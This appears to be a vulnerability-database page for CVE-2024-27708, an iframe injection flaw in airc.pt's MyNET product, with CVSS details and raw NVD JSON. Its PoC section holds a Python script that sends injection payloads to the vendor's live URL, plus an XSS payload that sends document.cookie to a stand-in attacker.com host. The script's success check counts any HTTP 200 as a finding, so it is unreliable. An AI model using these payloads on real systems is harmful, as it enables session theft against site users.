Security Vulnerability Report
中文
CVE-2024-27708 CVSS 9.6 CRITICAL

CVE-2024-27708

Published: 2025-12-22 20:15:44
Last Modified: 2026-01-02 14:28:50

Description

Iframe injection vulnerability in airc.pt/solucoes-servicos.solucoes MyNET v.26.06 and before allows a remote attacker to execute arbitrary code via the src parameter.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:* - VULNERABLE
MyNET v.26.06及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-27708 Iframe Injection PoC # Target: airc.pt MyNET v.26.06 and before target_url = "https://www.airc.pt/solucoes-servicos/solucoes" # Malicious iframe payload malicious_payload = { "segment": "MYN", "src": "javascript:alert('CVE-2024-27708 Iframe Injection')" } # Alternative payload - external iframe injection malicious_iframe_payload = { "segment": "MYN", "src": "https://attacker-controlled-site.com/malicious-page.html" } try: # Test basic injection response = requests.get(target_url, params=malicious_payload, timeout=10) print(f"[*] Target: {target_url}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Payload sent: {malicious_payload}") if "iframe" in response.text.lower() or response.status_code == 200: print("[+] Potential iframe injection detected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # XSS to RCE chain payload xss_payload = { "segment": "MYN", "src": "><img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie>" }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-27708", "sourceIdentifier": "[email protected]", "published": "2025-12-22T20:15:43.777", "lastModified": "2026-01-02T14:28:50.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Iframe injection vulnerability in airc.pt/solucoes-servicos.solucoes MyNET v.26.06 and before allows a remote attacker to execute arbitrary code via the src parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-75"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.06", "matchCriteriaId": "DCFAA24C-B96B-42BE-BCD9-D7761F5747DB"}]}]}], "references": [{"url": "https://github.com/esquim0/Common_Vulnerabilities_and_Exposures_CVE/blob/main/2024/MyNet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN", "source": "[email protected]", "tags": ["Product"]}]}}